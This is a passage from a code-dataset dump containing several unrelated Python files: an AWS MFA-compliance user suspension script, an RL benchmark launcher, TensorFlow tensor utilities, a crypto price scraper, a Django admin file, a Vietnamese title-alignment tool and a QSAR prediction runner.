update_res.append(res)\n    return update_res\n\n\ndef main():\n    print('### check start.')\n    for user_list in get_users():\n        mfa_stats = get_mfa_stats(user_list)\n        console_login_stats = check_console_login(user_list)\n        if 'MFA_False' in mfa_stats and 'Login_Yes' in console_login_stats:\n            create_date = check_create_date(user_list)\n            create_date = create_date.date()\n            now_date = datetime.date.today()\n            res_date = (now_date-create_date).days\n            \"\"\"\n            until_days is the grace period in days, counted from account creation,\n            during which a user may still be missing MFA.\n            \"\"\"\n            until_days = 7\n            if until_days <= res_date:\n                print(user_list + ' is Console Login YES. but have not set MFA for more than ' +\n                      str(res_date) + ' days')\n                result = suspend_user(user_list)\n                #print(result)\n            else:\n                pass  # compliant or still inside the grace period; nothing to do\n    print('### Finish')\n\n\nif __name__ == '__main__':\n    main()\n\n\n","sub_path":"user_check_suspend.py","file_name":"user_check_suspend.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"543551578","text":"#!/usr/bin/env python\n\"\"\"\nTianbing Xu 7-10-2017\n\"\"\"\nimport multiprocessing\nimport sys\nfrom subprocess import call\nimport numpy as np\n\nprefix_map = {\n    'c': 'cartpole_swing_up',\n    'd': 'pendulum',\n    'car': 'cartpole',\n    'mou': 'mountain_car',\n    'swim': 'swimmer',\n    'hopper': 'hopper',\n    'walker': 'walker',\n    'cheetah': 'cheetah',\n    'humanoid': 'humanoid',\n}\n\nalgorithm_map = {\n    'tr': 'trpo',\n    'svrg': 'svrg',\n}\n\nroot_dir = \"../logs/log_svrg_ant\"\nseed = 1\ngame = 'ant'\nalgorithm = \"svrg\"\nbatch_size = 50000\nmini_batch_sizes = [5000]\nmax_path_length = 1000\ndelta = 0.01\nn_itr = 1000\nmax_epochs = 1\ncg_iters = 10\nsubsample_factor = 0.1\nmax_batchs = [10]\n\n\nif __name__ == \"__main__\":\n    for mini_batch_size in mini_batch_sizes:\n        for max_batch in max_batchs:\n            command = \"python benchmark_svrg.py {:} {:} {:} {:} {:} {:} {:} {:} {:} {:} {:} {:} {:}\".format(\n                root_dir,\n                algorithm,\n                game,\n                seed,\n                batch_size,\n                mini_batch_size,\n                n_itr,\n                max_path_length,\n                delta,\n                max_epochs,\n                cg_iters,\n                subsample_factor,\n                max_batch)\n            print(command)\n            call(command, shell=True)\n\n            plotOut = \"fig.{:}_{:}_{:}_{:}_{:}.png\".format(\n                algorithm, game, n_itr, mini_batch_size, max_batch)\n            plotcmd = \"python plotComparison.py -o {:} -a {:} -e {:} -t {:} -m 1 -p 0 -i {:}\".format(\n                plotOut, algorithm_map[algorithm], prefix_map[game], n_itr, root_dir)\n            print(plotcmd)\n            #call(plotcmd, shell=True)\n","sub_path":"sandbox/rocky/tf/launchers/run_svrg_ant.py","file_name":"run_svrg_ant.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"93299695","text":"\"\"\"\n:Date: Dec 03, 2019\n:Version: 0.0.3\n\"\"\"\nimport functools\nimport logging\n\nimport tensorflow as tf\n\n\n# assuming args are just the doms\n# TODO: WARN(thadumi) doms could not be flat\ndef cross_args(*doms):\n    # a list is not hashable for lru but a tuple is\n    return _cross_args(tuple(doms))\n\n\n@functools.lru_cache(maxsize=None)\ndef _cross_args(doms):\n    logging.debug('cross_args: computing a new tensor_cross_args for' + str(doms))\n    result_doms = doms[0]\n\n    lambdas = []\n    for y_dom in doms[1:]:\n        result_doms, _cross_2args = cross_2args(result_doms, y_dom)\n        lambdas.append(_cross_2args)\n\n    def tensor_cross_args(*tensors):\n        result_tensor = tensors[0]\n        for i in range(len(lambdas)):\n            result_tensor = lambdas[i](result_tensor, tensors[i + 1])\n\n        return result_tensor\n\n    return result_doms, tensor_cross_args\n\n\ndef split_cross_args(result_tensor, *tensors):\n    result_flat = tf.reshape(result_tensor,\n                             (tf.math.reduce_prod(tf.shape(result_tensor)[:-1]),\n                              tf.shape(result_tensor)[-1]))\n\n    result_args = tf.split(result_flat, [tf.shape(tensor)[-1] for tensor in tensors], 1)\n    return result_args\n\n\ndef split_cross_2args(result_tensor):\n    return tf.split(result_tensor, 2, axis=-1)\n\n\ndef tensors_cross_2args_default(X, Y):\n    return tf.concat([X, Y], axis=-1)\n\n\ndef expands_x(X, number_of_times_x_expands=0):\n    '''\n    def condition(i, args):\n        return tf.greater(i, 0)\n\n    def body(i, 
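# get_users() above reads a single list_users() page, so it silently truncates
# on accounts with more users than one API page returns. A hedged paginated
# variant using boto3's standard paginator (the client argument is ours):
def get_users_paginated(iam_client):
    names = []
    for page in iam_client.get_paginator('list_users').paginate():
        names.extend(u['UserName'] for u in page['Users'])
    return names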
value):\n new_value = value[tf.newaxis, :]\n return tf.subtract(i, 1), new_value\n\n return tf.while_loop(condition, body,\n (number_of_times_x_expands, X),\n shape_invariants=(number_of_times_x_expands.get_shape(),\n tf.TensorShape([None] + X.shape.as_list())))\n\n '''\n\n tmp_X = X\n for _ in range(number_of_times_x_expands):\n tmp_X = tmp_X[tf.newaxis, :]\n\n return tmp_X\n\n\ndef expands_y(Y, number_of_times_y_expands=10):\n tmp_Y = Y\n for _ in range(number_of_times_y_expands):\n tmp_Y = tf.expand_dims(tmp_Y, -2)\n return tmp_Y\n\n\n@functools.lru_cache(maxsize=None)\ndef cross_2args(x_ltn_doms, y_ltn_doms):\n logging.debug('cross_2args: computing a new tensor_cross_args for' + str((x_ltn_doms, y_ltn_doms)))\n\n if (x_ltn_doms is None or x_ltn_doms == ()) and (y_ltn_doms is None or y_ltn_doms == ()):\n return tuple(), tensors_cross_2args_default\n\n X_Y = set(x_ltn_doms) - set(y_ltn_doms)\n Y_X = set(y_ltn_doms) - set(x_ltn_doms)\n\n # eX = X\n eX_doms = [x for x in x_ltn_doms]\n for y in Y_X:\n eX_doms = [y] + eX_doms\n number_of_times_x_expands = len(Y_X)\n\n # eY = Y\n eY_doms = [y for y in y_ltn_doms]\n for x in X_Y:\n eY_doms.append(x)\n number_of_times_y_expands = len(X_Y)\n\n perm_eY = []\n for y in eY_doms:\n perm_eY.append(eX_doms.index(y))\n default_perm = perm_eY + [len(perm_eY)]\n\n mult_eX_size = len(eX_doms) + 1\n mult_eY_size = len(eY_doms) + 1\n\n @tf.function\n def tensors_cross_2args(X, Y):\n eX = expands_x(X, number_of_times_x_expands=number_of_times_x_expands)\n eY = expands_y(Y, number_of_times_y_expands=number_of_times_y_expands)\n eY = tf.transpose(eY, perm=default_perm)\n\n mult_eX = [1] * mult_eX_size\n mult_eY = [1] * mult_eY_size\n\n for i in range(len(mult_eX) - 1):\n mult_eX[i] = tf.math.maximum(1, tf.math.floordiv(tf.shape(eY)[i], tf.shape(eX)[i]))\n mult_eY[i] = tf.math.maximum(1, tf.math.floordiv(tf.shape(eX)[i], tf.shape(eY)[i]))\n\n return tf.concat([tf.tile(eX, mult_eX), tf.tile(eY, mult_eY)], axis=-1)\n\n return tuple(eX_doms), tensors_cross_2args\n","sub_path":"ltn/backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"558932390","text":"import requests\nimport csv\nimport time\nCryptoPairs = {'BTCUSD':'BTC','ETHUSD':'ETH','BNBUSD':'BNB','BUSDUSD':'BUSD','BCHUSD':'BCH','ADAUSD':'ADA','LINKUSD':'LINK', 'ATOMUSD':'ATOM', 'CROUSD':'CRO',\n 'DOGEUSD':'DOGE', 'EOSUSD':'EOS', 'FTTUSD':'FTT','IOTUSD':'MIOTA', 'LTCUSD':'LTC','XMRUSD':'XMR', 'XEMUSD':'XEM', 'DOTUSD':'DOT', 'XRPUSD':'XRP','SOLUSD':'SOL', \n 'XLMUSD':'XLM', 'USDTUSD':'USDT', 'THETAUSD':'THETA', 'TRXUSD':'TRX', 'VETUSD':'VET', 'FILUSD':'FIL', 'SHIBUSD':'SHIB','USDCUSD':'USDC', 'MATICUSD':'MATIC',\n 'ALGOUSD':'ALGO',}\n\ndef countdown(t):\n \n while t:\n mins, secs = divmod(t, 60)\n timer = '{:02d}:{:02d}'.format(mins, secs)\n print(timer, end=\"\\r\")\n time.sleep(1)\n t -= 1\n\nclass Crypto_USD:\n def __init__(self):\n self.cryptoValue = []\n for crypto in CryptoPairs.keys():\n \n self.values = requests.get('https://www.bitstamp.net/api/v2/ticker/'+crypto.lower())\n try:\n print(self.values.json(), crypto.lower())\n \n self.cryptoPrice = (self.values.json().get('last'))\n priceCount = 0\n \"\"\" for price in self.cryptoPrice: #find the price between tens hundreds and thousands\n priceCount += 1 # to find the location of the period in the price\n if (price == '.' 
and priceCount == 6):# if price equal or over ten thosand put the comma in \n self.cryptoPrice = self.cryptoPrice[0:2]+','+self.cryptoPrice[2:8] \n elif(price == '.' and priceCount == 5):# if price over a thosand and below ten thosands put the comma in \n self.cryptoPrice = self.cryptoPrice[0]+','+self.cryptoPrice[1:7]\n elif(price == '.' and priceCount == 4):#if price equal to a hundred\n self.cryptoPrice = self.cryptoPrice[0:6]\n elif(price == '.' and priceCount == 3):#if price equal to a hundred\n self.cryptoPrice = self.cryptoPrice[0:5] \"\"\"\n self.cryptoValue.append([CryptoPairs.get(crypto),crypto.upper(), self.cryptoPrice, self.values.json().get('volume')]) \n except:\n print('404')\n print(self.cryptoValue)\n file_path = '/Users/EL-_-KDS/Documents/website Projects/Cryptonel/Exchange/Exhange_Data/Bitstamp/Price Results.csv'\n with open(file_path, 'w') as newFile:\n csvWriter = csv.writer(newFile)\n csvWriter.writerow(['Coin', 'Name_Pair', 'Price', 'volume'])\n for line in self.cryptoValue:\n csvWriter.writerow(line)\n","sub_path":"Exchange/Exhange_Data/Bitstamp/Crypto_Price_V2.py","file_name":"Crypto_Price_V2.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"119990096","text":"from django.contrib import admin\nfrom .models import Cliente, Cotizacion\n# Register your models here.\nclass ClienteAdmin(admin.ModelAdmin):\n readonly_fields = ('rut', 'nombre','apellido','correo','telefono','empresa')\n\nclass CotizacionAdmin(admin.ModelAdmin):\n readonly_fields = ('fecha', 'servicio' ,'cliente')\n\nadmin.site.register(Cliente, ClienteAdmin)\nadmin.site.register(Cotizacion, CotizacionAdmin)\n\n# Register your models here.\n","sub_path":"cotizacion/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"89438049","text":"import numpy.linalg\nfrom vncorenlp import VnCoreNLP\nimport pdb\nimport re\nimport numpy as np\nimport math\nimport datetime\nimport random\nimport sys\n\nvector = dict()\nlist_stopwords = list()\n\ndef compareTitle(src_title, tgt_title):\n\n count = 0\n for word in src_title:\n if (word in tgt_title):\n count = count + 1\n\n return (count / len(tgt_title))\n\ndef loadStopWords():\n f = open(\"stopwords.txt\", \"r\", encoding=\"utf-8\")\n for line in f:\n line = line.strip()\n list_stopwords.append(line)\n f.close()\n\ndef removeStopWord(words):\n global list_stopwords\n list_new_word = list()\n\n for word in words:\n if word not in list_stopwords:\n if(word.strip() != \"\"):\n list_new_word.append(word)\n return list_new_word\n\ndef loadVectorEmbbeding(vector):\n f = open(\"dict.txt\", \"r\", encoding=\"utf-8\")\n for line in f:\n line = line.strip()\n\n line = line.split(\" \")\n key = str(line[0])\n\n if('@@' in key):\n continue\n #print(line[1])\n\n if(key.lower() in vector):\n continue\n vector[key.lower()] = int(line[1])\n f.close()\n\ndef cosineSinmilar(src_vector, tgt_vector):\n #pdb.set_trace()\n y = np.sqrt(np.sum(np.square(src_vector))) * np.sqrt(np.sum(np.square(tgt_vector)))\n if y == 0:\n return 0\n x = np.sum(src_vector * tgt_vector)\n if x == 0:\n return 0\n return x / y\n\ndef wordToVector(word):\n\n global vector\n if word in vector:\n return vector[word]\n else:\n return random.randrange(1000, 20000)\n\ndef TF_IDF(src_sentence, tgt_sentence):\n dict_words = {}\n dict_src = {}\n dict_tgt = {}\n TF_IDF_CountWords(dict_words, dict_src, 
src_sentence)\n\n\n TF_IDF_CountWords(dict_words, dict_tgt, tgt_sentence)\n\n TF_IDF_Document_Point(dict_words, dict_src, dict_tgt)\n TF_IDF_Document_Point(dict_words, dict_tgt, dict_src)\n\n\n\n tf_idf_score = cosineSinmilar(TF_IDF_Vector(dict_words, dict_src), TF_IDF_Vector(dict_words, dict_tgt))\n\n if tf_idf_score > 0.97:\n return tf_idf_score\n\n if len(dict_tgt) > len(dict_src):\n size = len(dict_tgt)\n else:\n size = len(dict_src)\n \"\"\"\n x = DissSimilarVector(dict_src, dict_tgt, size)\n x2 = DissSimilarVector(dict_tgt, dict_src, size)\n \n distance = cosineSinmilar(x, x2)\n print(distance)\n score = 0.0\n\n if distance >0.2 and distance < 0.3:\n score = 0.025\n\n if distance >0.4 and distance < 0.6:\n score = 0.035\n\n if distance >0.6 and distance < 0.8:\n score = 0.04\n\n if distance >0.8:\n score = 0.045\n \"\"\"\n\n return tf_idf_score\n\ndef TF_IDF_CountWords(dict_words, dict_, words):\n\n for word in words:\n if word not in dict_words:\n dict_words[word] = 1\n else:\n dict_words[word] = dict_words[word] + 1\n\n if word not in dict_:\n dict_[word] = 1\n else:\n dict_[word] = dict_[word] + 1\n\ndef TF_IDF_Document_Point(dict_words, dict_src, dict_tgt ):\n\n idf = {}\n for word in dict_src :\n\n number_of_word_in_sentences = dict_src[word]\n number_of_sentences_contains = 1\n\n tf = (number_of_word_in_sentences / dict_words[word])\n\n if word in dict_tgt:\n number_of_sentences_contains = number_of_sentences_contains + 1\n\n #idf = math.log(2/number_of_sentences_contains)\n idf = math.log(2/number_of_sentences_contains,10)\n dict_src[word] = tf * idf\n\ndef TF_IDF_Vector(dict_words, dict_src):\n vector = np.zeros(len(dict_words))\n\n start = 0\n for word in dict_words:\n if word in dict_src:\n if(dict_src[word] == 0):\n vector[start] = 1\n else:\n vector[start] = dict_src[word]\n else:\n vector[start] = -1\n start = start + 1\n return vector\n\ndef DissSimilarVector(dict_src, dict_tgt,size):\n vector = np.ones(size)\n\n start = 0\n # for each word not in dict_tgt\n for word_src in dict_src:\n\n if word_src not in dict_tgt:\n vector[start] = -wordToVector(word_src)\n print(wordToVector(word_src))\n start += 1\n continue\n\n vector[start] = wordToVector(word_src)\n start += 1\n print(vector)\n return vector\n\ndef sentenceToTokenize(sentences):\n global annotator\n flag = False\n\n word_segmented_text = annotator.tokenize(sentences)\n tokenSentence = \"\"\n\n for sentence in word_segmented_text[0]:\n if(sentence !=\"\" or sentence!= \"\" ):\n if(sentence == \"_\"):\n tokenSentence = tokenSentence.strip() + sentence\n flag = True\n continue\n if flag:\n flag = False\n tokenSentence = tokenSentence + sentence\n continue\n tokenSentence = tokenSentence + \" \" + sentence\n\n return tokenSentence.strip()\n\ndef preprocessString(list_dict_src, token=True):\n start = 0\n length = len(list_dict_src)\n\n while (start < length):\n\n sentence = list_dict_src[start]['title']\n\n sentence = sentence.strip()\n sentence = re.sub(\"[!.,@#$%^&*()?<>“]+\", \"\", sentence)\n sentence = re.sub(\"[-]+\", \" \", sentence)\n sentence = re.sub(\"\\s+\", \" \", sentence)\n\n if(token):\n sentence = sentenceToTokenize(sentence)\n sentence = sentence.lower()\n list_dict_src[start]['title'] = sentence\n if (token):\n list_dict_src[start][\"words\"] = removeStopWord(sentence.split(\" \"))\n else:\n list_dict_src[start][\"words\"] = sentence.split(\" \")\n start = start + 1\n
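# Example (for illustration only; the sample titles are the same ones exercised in\n# the __main__ block at the bottom of this file):\n#\n#   src = removeStopWord(\"việt_nam hợp_tác hàn_quốc\".split(\" \"))\n#   tgt = removeStopWord(\"việt_nam hợp_tác lào\".split(\" \"))\n#   similarity = TF_IDF(src, tgt)  # cosine similarity of the two TF-IDF vectors\n#\n# The aligners below accept a candidate pair once this score clears the current\n# threshold, which starts at `score` and is relaxed in 0.1 steps down to `score_lim`.\n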
\n\"\"\"\nAlign News By Title And Date\n\"\"\"\ndef AlignByTitleAndDateNews(list_dict_src, list_dict_tgt, tgt, date_range=20, score_lim=0.4, score=0.8, token=True):\n \"\"\"\n\n :param list_dict_src: list of dictionaries holding the link, date and title in the source language\n :param list_dict_tgt: list of dictionaries holding the link, date and title in the target language, translated into the source language\n :param tgt: target language\n :param date_range: maximum allowed gap (in days) between publication dates\n :param score_lim: lowest similarity threshold that is still accepted\n :param score: starting similarity threshold\n :param token: whether to tokenize the titles\n :return:\n\n \"\"\"\n for link in list_dict_src:\n src_datetime = datetime.datetime.strptime(link['date'], \"%d/%m/%Y\")\n link['date'] = src_datetime\n\n for link in list_dict_tgt:\n tgt_datetime = datetime.datetime.strptime(link['date'], \"%d/%m/%Y\")\n link['date'] = tgt_datetime\n\n preprocessString(list_dict_src, token=token)\n preprocessString(list_dict_tgt, token=token)\n\n lim_src = len(list_dict_src)\n lim_tgt = len(list_dict_tgt)\n\n list_align_title = list()\n print(len(list_dict_src), len(list_dict_tgt))\n while score >= score_lim:\n print(score)\n start_src = 0\n\n checkPoint = 0\n time = - date_range\n while (start_src < lim_src):\n max_ = 0\n start_tgt = checkPoint\n true_tgt = 0\n print(start_tgt)\n\n while (start_tgt < lim_tgt):\n\n delta = list_dict_src[start_src]['date'] - list_dict_tgt[start_tgt]['date']\n # time gap exceeds the date_range window\n\n if(abs(delta.days) > date_range):\n break\n\n if delta.days < 0 and time > delta.days:\n time = delta.days\n checkPoint = start_tgt\n\n if(token):\n true_score = TF_IDF(list_dict_src[start_src][\"words\"], list_dict_tgt[start_tgt]['words'])\n else:\n true_score = compareTitle(list_dict_src[start_src][\"words\"], list_dict_tgt[start_tgt]['words'])\n\n if (max_ < true_score):\n max_ = true_score\n true_tgt = start_tgt\n\n if(max_ >= 1.0):\n break\n\n\n start_tgt = start_tgt + 1\n # print(list_dict_src[start_src]['title'], max_)\n if (max_ < score_lim):\n del (list_dict_src[start_src])\n lim_src = len(list_dict_src)\n continue\n\n if max_ > score:\n f = open(\"thongke.csv\", \"a\", encoding=\"utf-8\")\n f.write(\"{} \\t {} \\t {}\\n\".format(list_dict_src[start_src]['title'], list_dict_tgt[true_tgt]['title'], max_))\n f.close()\n list_align_title.append({\"vi\": list_dict_src[start_src]['url'], tgt: list_dict_tgt[true_tgt]['url']})\n\n del (list_dict_src[start_src])\n del (list_dict_tgt[true_tgt])\n\n lim_src = len(list_dict_src)\n lim_tgt = len(list_dict_tgt)\n continue\n\n start_src = start_src + 1\n\n score = score - 0.1\n return list_align_title\n\ndef AlignByTitleNews(list_dict_src, list_dict_tgt , tgt, score_lim=0.35, score=0.75, token = True):\n\n src = \"vi\"\n\n if(len(list_dict_src) > len(list_dict_tgt)):\n temp_list = list_dict_src.copy()\n list_dict_src = list_dict_tgt\n list_dict_tgt = temp_list\n temp = tgt\n tgt = \"vi\"\n src = temp\n\n\n lim_src = len(list_dict_src)\n lim_tgt = len(list_dict_tgt)\n print(len(list_dict_src), len(list_dict_tgt))\n preprocessString(list_dict_src)\n preprocessString(list_dict_tgt)\n\n list_align_title = list()\n\n while score >= score_lim:\n print(score)\n start_src = 0\n\n checkPoint = 0\n\n while (start_src < lim_src):\n max_ = 0\n start_tgt = checkPoint\n true_tgt = 0\n # print(start_tgt)\n\n while (start_tgt < lim_tgt):\n # compare the titles\n if(token):\n true_score = TF_IDF(list_dict_src[start_src]['words'],\n list_dict_tgt[start_tgt]['words'])\n else:\n true_score = compareTitle(list_dict_src[start_src][\"words\"], list_dict_tgt[start_tgt]['words'])\n if (max_ < true_score):\n max_ = true_score\n true_tgt = start_tgt\n\n if (max_ >= 1.0):\n break\n\n if (true_score 
< score):\n start_tgt = start_tgt + 1\n continue\n\n start_tgt = start_tgt + 1\n\n # print(list_dict_src[start_src]['title'], max_)\n if (max_ < score_lim):\n del (list_dict_src[start_src])\n lim_src = len(list_dict_src)\n continue\n\n if max_ > score:\n print(list_dict_src[start_src]['title'] + \" / \" + list_dict_tgt[true_tgt]['title'], max_)\n\n list_align_title.append({src: list_dict_src[start_src]['url'], tgt: list_dict_tgt[true_tgt]['url']})\n\n del (list_dict_src[start_src])\n del (list_dict_tgt[true_tgt])\n\n lim_src = len(list_dict_src)\n lim_tgt = len(list_dict_tgt)\n continue\n\n start_src = start_src + 1\n\n score = score - 0.1\n return list_align_title\n# To perform word segmentation, POS tagging and then NER\n# annotator = VnCoreNLP(\"\", annotators=\"wseg,pos,ner\", max_heap_size='-Xmx2g')\n# To perform word segmentation and then POS tagging\n# annotator = VnCoreNLP(\"\", annotators=\"wseg,pos\", max_heap_size='-Xmx2g')\n# To perform word segmentation only\n# annotator = VnCoreNLP(\"\", annotators=\"wseg\", max_heap_size='-Xmx500m')\nloadVectorEmbbeding(vector)\nloadStopWords()\nannotator = VnCoreNLP(\"./VnCoreNLP/VnCoreNLP-1.1.1.jar\", annotators=\"wseg,pos,ner,parse\", max_heap_size='-Xmx2g',port=8887)\n\nif __name__ == '__main__':\n\n # Input\n text_origin = \"việt_nam hợp_tác hàn_quốc\"\n text_trans = \"việt_nam hợp_tác lào\"\n # To perform word segmentation, POS tagging, NER and then dependency parsing\n #annotated_text = annotator.annotate(text)\n #print(sentenceToTokenize(text_trans).split(\" \"))\n #print(sentenceToTokenize(text_origin).split(\" \"))\n print(removeStopWord(text_trans.split(\" \")))\n print(removeStopWord(text_origin.split(\" \")))\n print(TF_IDF(removeStopWord(text_trans.split(\" \")), removeStopWord(text_origin.split(\" \"))))\n","sub_path":"SentenceAlign.py","file_name":"SentenceAlign.py","file_ext":"py","file_size_in_byte":12427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"355161688","text":"\"\"\"\nProgram: runmodel.py\n\nWritten: Joslyn Jung & Andrew Fant\n\nThis is a python program to load a saved QSAR regression model and make a prediction on a set of molecules provided in\nthe SMILES molecular data format.\n\ninput: one file named testset-2.smi. 
SMILES formatted holding the structure of the molecules in the model\n training set.\n\noutput: prediction\n\"\"\"\n\nimport sys\nimport pathlib\nproject_path = pathlib.Path('~/repositories/herg')\nproject_path = project_path.expanduser()\ncode_dir = project_path / 'common'\nsys.path.insert(0, str(code_dir))\n\nimport os\nimport numpy as np\nfrom rdkit.Chem import AllChem as Chem\nfrom molvs import Standardizer\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nfrom descriptor_setup import dnames, dlist\nfrom rdkit import DataStructs\nfrom rdkit.Chem.Fingerprints import FingerprintMols\nimport pickle\n\n\ndef read_mols(basename, randsplit, randstate):\n\n currworkdir = os.getcwd()\n datadir = os.path.join(currworkdir,'data')\n modeldir = os.path.join(currworkdir,'models')\n mol_data_filename = basename + '.smi'\n act_data_filename = basename + '.act'\n moldatafile = os.path.join(datadir,mol_data_filename)\n actdatafile = os.path.join(datadir,act_data_filename)\n\n # Load model from file\n model_filename = \"model_RF_\" + repr(randsplit) + \"_\" + repr(randstate) + \".dat\"\n model_file = os.path.join(modeldir,model_filename)\n loaded_model = pickle.load(open(model_file, \"rb\"))\n\n index_filename = \"indices_\" + repr(randsplit) + \"_\" + repr(randstate) + \".dat\"\n index_file = os.path.join(modeldir,index_filename)\n with open(index_file, 'rb') as f:\n indexes = pickle.load(f)\n\n appdom_fp_filename = \"training-FPs_\" + repr(randsplit) + \"_\" + repr(randstate) + \".dat\"\n appdom_fp_file = os.path.join(modeldir,appdom_fp_filename)\n with open(appdom_fp_file, 'rb') as f:\n appdom_fps = pickle.load(f)\n\n appdom_rad_filename = \"AD-radius_\" + repr(randsplit) + \"_\" + repr(randstate) + \".dat\"\n appdom_rad_file = os.path.join(modeldir,appdom_rad_filename)\n with open(appdom_rad_file, 'rb') as f:\n appdom_radius = pickle.load(f)\n\n # Read in molecules from test set\n molfh = open(moldatafile)\n\n molecules = [] # array of tuples: (molecule, molecule name)\n\n for molline in molfh:\n line = molline.split()\n mol = Chem.MolFromSmiles(line[0])\n molname = line[1]\n molecules.append((mol, molname))\n\n molfh.close()\n\n if os.path.isfile(actdatafile):\n actfh = open(actdatafile)\n\n activities = [] # array of tuples: (activity, molecule name)\n\n for actline in actfh:\n line = actline.split()\n act = float(line[1])\n actname = line[0]\n activities.append((act, actname))\n\n actfh.close()\n\n mols_train = []\n molnames_train = []\n\n if 'activities' in locals():\n acts_train = []\n actnames_train = []\n\n for i in range(len(molecules)):\n mols_train.append(molecules[i][0])\n molnames_train.append(molecules[i][1])\n if 'activities' in locals():\n acts_train.append(activities[i][0])\n actnames_train.append(activities[i][1])\n\n # Standardize structures\n s = Standardizer()\n standard_mols_train = []\n for mol in mols_train:\n standard_mols_train.append(s.standardize(mol))\n\n return_dict = {}\n\n return_dict['molnames'] = molnames_train\n return_dict['molecules'] = standard_mols_train\n return_dict['model'] = loaded_model\n return_dict['inds'] = indexes\n return_dict['ad_fps'] = appdom_fps\n return_dict['ad_radius'] = appdom_radius\n if 'activities' in locals():\n return_dict['activities'] = acts_train\n\n return return_dict\n\n\ndef check_appdom(*args):\n if len(args) < 4 or len(args) > 5:\n print(\"Error: incorrect number of arguments passed to check_appdom()\")\n exit(1)\n\n appdom_fps = args[0]\n appdom_radius = args[1]\n pred_mols = args[2]\n pred_names = args[3]\n if 
len(args) == 5:\n pred_acts = args[4]\n\n accept_mols = []\n accept_names = []\n reject_mols = []\n reject_names = []\n\n if 'pred_acts' in locals():\n accept_acts = []\n reject_acts = []\n\n for i in range(len(pred_mols)):\n test_fp = FingerprintMols.FingerprintMol(pred_mols[i])\n distances = []\n for training_fp in appdom_fps:\n distances.append(1.0 - (DataStructs.FingerprintSimilarity(training_fp,test_fp)))\n\n distances = np.array(distances)\n if np.min(distances) <= appdom_radius:\n accept_mols.append(pred_mols[i])\n accept_names.append(pred_names[i])\n if 'pred_acts' in locals():\n accept_acts.append(pred_acts[i])\n else:\n reject_mols.append(pred_mols[i])\n reject_names.append(pred_names[i])\n if 'pred_acts' in locals():\n reject_acts.append(pred_acts[i])\n\n print(\"Compound %s is out of the AD for this model\" % pred_names[i])\n\n if len(reject_names) == 0:\n print(\"No molecules rejected for prediction by AD\")\n\n return_dict = {}\n\n return_dict['test_mols'] = accept_mols\n return_dict['test_names'] = accept_names\n return_dict['rej_mols'] = reject_mols\n return_dict['rej_names'] = reject_names\n\n if 'pred_acts' in locals():\n return_dict['test_acts'] = accept_acts\n return_dict['rej_acts'] = reject_acts\n\n return(return_dict)\n\n\ndef calc_descs(mols_train, indexes):\n # Calculate descriptors\n raw_descriptors = np.zeros((len(mols_train), len(dlist)))\n for i in range(len(mols_train)):\n for j in range(len(dlist)):\n raw_descriptors[i, j] = dlist[j](mols_train[i])\n\n # Select descriptors\n del_indexes = []\n for i in range(len(dlist)):\n if i not in indexes:\n del_indexes.append(i)\n\n del_indexes.reverse()\n\n for i in del_indexes:\n raw_descriptors = np.delete(raw_descriptors, [i], axis=1)\n\n return (raw_descriptors)\n\n\ndef make_preds(*args):\n\n if len(args) < 3 or len(args) > 4:\n print(\"Error: incorrect number of arguments passed to make_preds()\")\n\n mol_names = args[0]\n descs = args[1]\n saved_model = args[2]\n if len(args) == 4:\n y_true = args[3]\n\n # Make predictions for test data using previous model\n y_pred = saved_model.predict(descs)\n\n return_dict = {}\n\n return_dict['predictions'] = y_pred\n\n if 'y_true' in locals():\n print(\"Molecule\\tActual Act.\\tPredicted Act.\")\n for out_line in range(len(mol_names)):\n print(mol_names[out_line], \"\\t\", y_true[out_line], \"\\t\\t\", y_pred[out_line])\n print(\"\")\n print(\"Accuracy Score:\",accuracy_score(y_true,y_pred))\n print(\"\")\n confmat = confusion_matrix(y_true,y_pred, labels=[1,0])\n print(confmat)\n return_dict['accuracy'] = accuracy_score(y_true, y_pred)\n else:\n print(\"Molecule\\tPredicted Act.\")\n for out_line in range(len(mol_names)):\n print(mol_names[out_line], \"\\t\", y_pred[out_line])\n\n return return_dict\n\n
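# Example (for illustration; mirrors the __main__ block below with its own sample\n# arguments):\n#\n#   model_data = read_mols(\"AmyCompounds\", 42, 301)   # molecules + pickled model\n#   ad = check_appdom(model_data['ad_fps'], model_data['ad_radius'],\n#                     model_data['molecules'], model_data['molnames'])\n#   descriptors = calc_descs(ad['test_mols'], model_data['inds'])\n#   make_preds(ad['test_names'], descriptors, model_data['model'])\n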
\nif __name__ == '__main__':\n model_data = read_mols(\"AmyCompounds\", 42, 301)\n molnames = model_data['molnames']\n molecules = model_data['molecules']\n model = model_data['model']\n inds = model_data['inds']\n ad_fps = model_data['ad_fps']\n ad_radius = model_data['ad_radius']\n if len(model_data.keys()) == 7:\n activities = model_data['activities']\n\n if 'activities' in locals():\n appdom_results = check_appdom(ad_fps, ad_radius, molecules, molnames, activities)\n else:\n appdom_results = check_appdom(ad_fps, ad_radius, molecules, molnames)\n test_mols = appdom_results['test_mols']\n test_names = appdom_results['test_names']\n rej_mols = appdom_results['rej_mols']\n rej_names = appdom_results['rej_names']\n if len(appdom_results.keys()) == 6:\n test_acts = appdom_results['test_acts']\n rej_acts = appdom_results['rej_acts']\n\n descriptors = calc_descs(test_mols, inds)\n\n if 'activities' in locals():\n make_preds(test_names, descriptors, model, test_acts)\n else:\n make_preds(test_names, descriptors, model)\n\n","sub_path":"hERG/classifier/runmodel.py","file_name":"runmodel.py","file_ext":"py","file_size_in_byte":8216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
